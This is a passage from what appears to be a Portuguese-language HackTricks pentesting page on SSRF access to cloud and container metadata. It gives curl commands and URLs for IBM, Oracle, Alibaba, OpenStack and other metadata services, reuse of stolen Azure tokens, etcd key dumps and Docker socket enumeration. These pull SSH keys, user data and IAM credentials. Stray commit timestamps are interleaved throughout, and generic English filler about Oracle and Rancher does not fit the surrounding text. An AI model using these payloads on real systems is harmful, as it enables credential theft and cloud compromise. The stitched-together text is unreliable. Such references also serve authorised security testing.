# API request to graph endpoint (get enterprise applications)
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
2022-09-25 14:14:17 +00:00
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
2022-09-25 14:14:17 +00:00
}
(Invoke-RestMethod @RequestParams).value
2022-09-25 14:51:27 +00:00
# Using AzureAD Powershell module witho both management and graph tokens
$token = 'eyJ0e..'
$graphaccesstoken = 'eyJ0eX..'
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc
# Try to get current perms over resources
Get-AzResource
## The following error means that the user doesn't have permissions over any resource
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
At line:1 char:1
+ Get-AzResource
+ ~~~~~~~~~~~~~~
+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
+ FullyQualifiedErrorId :
2022-09-25 14:51:27 +00:00
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
2022-09-25 14:14:17 +00:00
```
2023-02-10 12:30:22 +00:00
## IBM Cloud <a href="#2af0" id="2af0"></a>
{% hint style="warning" %}
Observe que, por padrão, a metadados não está habilitada na IBM, portanto, é possível que você não consiga acessá-la mesmo estando dentro de uma VM da IBM Cloud.
2023-02-10 12:30:22 +00:00
{% endhint %}
{% code overflow="wrap" %}
```bash
export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\
-H "Metadata-Flavor: ibm"\
-H "Accept: application/json"\
-d '{
"expires_in": 3600
}' | jq -r '(.access_token)'`
2023-02-10 12:30:22 +00:00
# Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
# Get SSH keys info
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
# Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
# Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq
# Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
```
{% endcode %}
## Packetcloud <a href="#2af0" id="2af0"></a>
2023-06-06 18:56:34 +00:00
Documentação disponível em [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
2023-02-10 12:30:22 +00:00
2022-05-02 18:53:13 +00:00
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
(cabeçalho necessário? desconhecido)
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/openstack
```
2022-05-02 18:53:13 +00:00
## HP Helion <a href="#a8e0" id="a8e0"></a>
2022-02-13 12:30:13 +00:00
(cabeçalho necessário? desconhecido)
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/2009-04-04/meta-data/
```
2022-05-02 18:53:13 +00:00
## Oracle Cloud <a href="#a723" id="a723"></a>
2022-02-13 12:30:13 +00:00
A SSRF vulnerability occurs when an application allows an attacker to make requests to arbitrary URLs on behalf of the server. This can be exploited to perform various attacks, such as accessing internal resources, scanning internal networks, or attacking other systems.
2023-06-06 18:56:34 +00:00
In the context of cloud environments, SSRF vulnerabilities can be particularly dangerous because they can be used to access metadata endpoints or internal APIs of cloud/SaaS platforms. This can lead to unauthorized access to sensitive information or even compromise the entire cloud infrastructure.
Oracle Cloud is a popular cloud platform that provides a wide range of services, including compute instances, storage, and databases. It is important to be aware of the SSRF risks in Oracle Cloud and take appropriate measures to mitigate them.
2023-06-06 18:56:34 +00:00
To prevent SSRF attacks in Oracle Cloud, consider the following recommendations:
2023-06-06 18:56:34 +00:00
1. **Input validation and whitelisting**: Implement strict input validation and whitelist allowed URLs or IP addresses. This can help prevent attackers from making requests to unauthorized resources.
2023-06-06 18:56:34 +00:00
2. **Use metadata service protection**: Oracle Cloud provides a metadata service that allows instances to retrieve information about themselves. Ensure that the metadata service is protected and not accessible from untrusted sources.
2023-06-06 18:56:34 +00:00
3. **Restrict network access**: Configure network security groups and firewalls to restrict outbound connections from instances. This can help prevent instances from making requests to external resources without proper authorization.
4. **Secure internal APIs**: If your application uses internal APIs or services, ensure that they are properly secured and not accessible from external sources. Use authentication and authorization mechanisms to control access to these APIs.
5. **Regularly update and patch**: Keep your Oracle Cloud instances and services up to date with the latest security patches. This can help protect against known vulnerabilities and reduce the risk of SSRF attacks.
By following these recommendations, you can enhance the security of your Oracle Cloud environment and reduce the risk of SSRF vulnerabilities. Remember to regularly test your applications for SSRF vulnerabilities and perform penetration testing to identify any potential weaknesses.
2022-02-13 12:30:13 +00:00
```
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
2022-05-02 18:53:13 +00:00
## Alibaba <a href="#51bd" id="51bd"></a>
2022-02-13 12:30:13 +00:00
```
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
2022-05-02 18:53:13 +00:00
## Kubernetes ETCD <a href="#c80a" id="c80a"></a>
2022-02-13 12:30:13 +00:00
Pode conter chaves de API e IPs e portas internas
2022-02-13 12:30:13 +00:00
```
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
2022-05-02 18:53:13 +00:00
## Docker <a href="#ac0b" id="ac0b"></a>
2022-02-13 12:30:13 +00:00
```
http://127.0.0.1:2375/v1.24/containers/jsonSimple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
2022-05-02 18:53:13 +00:00
## Rancher <a href="#8cb7" id="8cb7"></a>
2022-02-13 12:30:13 +00:00
Rancher is a popular open-source container management platform that allows users to easily deploy and manage containers in a Kubernetes cluster. It provides a user-friendly interface and a wide range of features for managing containerized applications.
Rancher supports various cloud providers, including AWS, GCP, and Azure, allowing users to deploy their applications on different cloud platforms. It also provides integration with other tools and services, such as monitoring and logging solutions, to enhance the management and monitoring capabilities of containerized applications.
With its intuitive interface and powerful features, Rancher simplifies the process of deploying and managing containers, making it a popular choice among developers and system administrators. Whether you are running a small-scale application or a large-scale production environment, Rancher can help you streamline your container management tasks and improve the efficiency of your operations.
```
curl http://rancher-metadata/<version>/<path>
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
2023-06-06 18:56:34 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
2023-06-06 18:56:34 +00:00
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>